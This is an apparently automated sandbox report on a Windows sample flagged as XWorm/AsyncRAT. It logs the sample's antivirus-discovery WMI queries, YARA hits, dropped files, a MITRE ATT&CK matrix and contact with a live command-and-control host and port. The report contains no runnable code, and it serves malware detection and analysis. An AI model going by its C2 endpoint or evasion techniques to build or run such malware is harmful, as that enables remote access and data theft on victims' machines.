              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edbres00001.jrs VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edbres00002.jrs VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.log VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.log VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.log VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.chk VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\EntClientDb.jfm VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\EntClientDb.edb VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\EntClientDb.edb VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\tmp.edb VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Resources\Fonts\SegMVR2.ttf VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Resources\Fonts\SegMVR2.ttf VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Resources\Fonts\SegMVR2.ttf VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Resources\Fonts\SegMVR2.ttf VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Resources\Fonts\SegMVR2.ttf VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.chk VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\SRPData.xml VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Windows\Fonts\segoeuil.ttf VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
              Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
              Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
              Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: XClient.exe, 00000003.00000002.3626778140.000000001B47E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s Defender\MsMpeng.exe
              Source: XClient.exe, 00000003.00000002.3626778140.000000001B440000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000003.00000002.3626778140.000000001B4D5000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000003.00000002.3626778140.000000001B47E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 3.0.XClient.exe.190000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000000.1156694138.0000000000192000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: test2.exe.bin.exe PID: 7744, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: XClient.exe PID: 7840, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\test, type: DROPPED
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED

              Remote Access Functionality

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 3.0.XClient.exe.190000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000000.1156694138.0000000000192000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: test2.exe.bin.exe PID: 7744, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: XClient.exe PID: 7840, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\test, type: DROPPED
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Windows Management Instrumentation              		1
              Registry Run Keys / Startup Folder              		11
              Process Injection              		21
              Masquerading              		OS Credential Dumping231
              Security Software Discovery              		Remote Services11
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts12
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              Registry Run Keys / Startup Folder              		1
              Disable or Modify Tools              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Native API              		Logon Script (Windows)1
              DLL Side-Loading              		141
              Virtualization/Sandbox Evasion              		Security Account Manager141
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts1
              PowerShell              		Login HookLogin Hook11
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              File and Directory Discovery              		SSHKeylogging13
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Obfuscated Files or Information              		Cached Domain Credentials23
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
              Software Packing              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1639881 Sample: test2.exe.bin.exe Startdate: 16/03/2025 Architecture: WINDOWS Score: 100 34 Dyno15-41078.portmap.host 2->34 36 settings-ssl.xboxlive.com.edgekey.net 2->36 38 2 other IPs or domains 2->38 46 Suricata IDS alerts for network traffic 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 14 other signatures 2->52 8 test2.exe.bin.exe 3 2->8         started        12 svchost.exe 1 1 2->12         started        15 Music.UI.exe 63 38 2->15         started        17 2 other processes 2->17 signatures3 process4 dnsIp5 32 C:\Users\user\AppData\Local\...\XClient.exe, PE32 8->32 dropped 64 Encrypted powershell cmdline option found 8->64 19 XClient.exe 1 4 8->19         started        24 powershell.exe 23 8->24         started        42 127.0.0.1 unknown unknown 12->42 44 e87.dspb.akamaiedge.net 92.123.20.9, 443, 49710 AKAMAI-ASUS European Union 15->44 file6 signatures7 process8 dnsIp9 40 Dyno15-41078.portmap.host 193.161.193.99, 41078, 49711, 49714 BITREE-ASRU Russian Federation 19->40 30 C:\Users\user\AppData\Local\Temp\test, PE32 19->30 dropped 54 Antivirus detection for dropped file 19->54 56 Multi AV Scanner detection for dropped file 19->56 58 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 19->58 60 Protects its processes via BreakOnTermination flag 19->60 62 Loading BitLocker PowerShell Module 24->62 26 conhost.exe 24->26         started        28 WmiPrvSE.exe 24->28         started        file10 signatures11 process12

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              test2.exe.bin.exe69%VirustotalBrowse
              test2.exe.bin.exe81%ReversingLabsWin32.Ransomware.Generic
              test2.exe.bin.exe100%AviraTR/Crypt.ZPACK.Gen

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\test100%AviraTR/Spy.Gen
              C:\Users\user\AppData\Local\Temp\XClient.exe100%AviraTR/Spy.Gen
              C:\Users\user\AppData\Local\Temp\XClient.exe92%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
              C:\Users\user\AppData\Local\Temp\test92%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              Dyno15-41078.portmap.host100%Avira URL Cloudmalware
              http://ns.adobe.om/100%Avira URL Cloudmalware
              http://ns.aobe0%Avira URL Cloudsafe
              http://ns.adoe.cf0%Avira URL Cloudsafe
              https://settings-ssl.xboxlive.comPN0%Avira URL Cloudsafe
              http://ns.adobeTy0%Avira URL Cloudsafe
              http://ns.adob/0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              e87.dspb.akamaiedge.net
              		92.123.20.9
              		truefalse
                		high
                Dyno15-41078.portmap.host
                		193.161.193.99
                		truetrue
                  		unknown
                  settings-ssl.xboxlive.com
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://settings-ssl.xboxlive.com/XBLWinClient/v10_music/configuration.xmlfalse
                      		high
                      Dyno15-41078.portmap.hosttrue
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1281166707.000000000609D000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://login.windows.netMusic.UI.exe, 00000004.00000002.3634239371.000002CCD90F8000.00000004.00000020.00020000.00000000.sdmp, Music.UI.exe, 00000004.00000002.3638925659.000002CCD953C000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://iptc.org/std1.Music.UI.exe, 00000004.00000002.3629721021.000002CCD821B000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1270956390.0000000005186000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://ns.adobe.om/Music.UI.exe, 00000004.00000002.3629721021.000002CCD821B000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1270956390.0000000005186000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1270956390.0000000005186000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://go.micropowershell.exe, 00000001.00000002.1270956390.000000000581C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1270956390.0000000005990000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://xsts.auth.xboxlive.comMusic.UI.exe, 00000004.00000002.3634239371.000002CCD90F8000.00000004.00000020.00020000.00000000.sdmp, Music.UI.exe, 00000004.00000002.3638925659.000002CCD953C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://contoso.com/Licensepowershell.exe, 00000001.00000002.1281166707.000000000609D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://contoso.com/Iconpowershell.exe, 00000001.00000002.1281166707.000000000609D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://xsts.auth.xboxlive.com/0Music.UI.exe, 00000004.00000002.3634239371.000002CCD90F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://crl.ver)svchost.exe, 00000007.00000002.2862185954.000002CC6B400000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://g.live.com/odclientsettings/ProdV2.C:edb.log.7.drfalse
                                                		high
                                                https://settings-ssl.xboxlive.com/Music.UI.exe, 00000004.00000003.1477016183.000002CCD8C81000.00000004.00000020.00020000.00000000.sdmp, Music.UI.exe, 00000004.00000002.3633444451.000002CCD8C83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://musicart.xboxlive.com/9/5c6a4700-0000-0000-0000-000000000002/504/image.jpgMusic.UI.exe, 00000004.00000002.3633566909.000002CCD8CDC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://ns.aobeMusic.UI.exe, 00000004.00000002.3629721021.000002CCD821B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1270956390.0000000005186000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://login.windows.local/Music.UI.exe, 00000004.00000002.3638925659.000002CCD953C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://g.live.com/odclientsettings/Prod.C:edb.log.7.drfalse
                                                          		high
                                                          https://login.windows.localMusic.UI.exe, 00000004.00000002.3638925659.000002CCD953C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://login.windows.net/Music.UI.exe, 00000004.00000002.3634239371.000002CCD90F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://g.live.com/odclientsettings/ProdV2edb.log.7.drfalse
                                                                		high
                                                                http://ns.adoe.cfMusic.UI.exe, 00000004.00000002.3629721021.000002CCD821B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
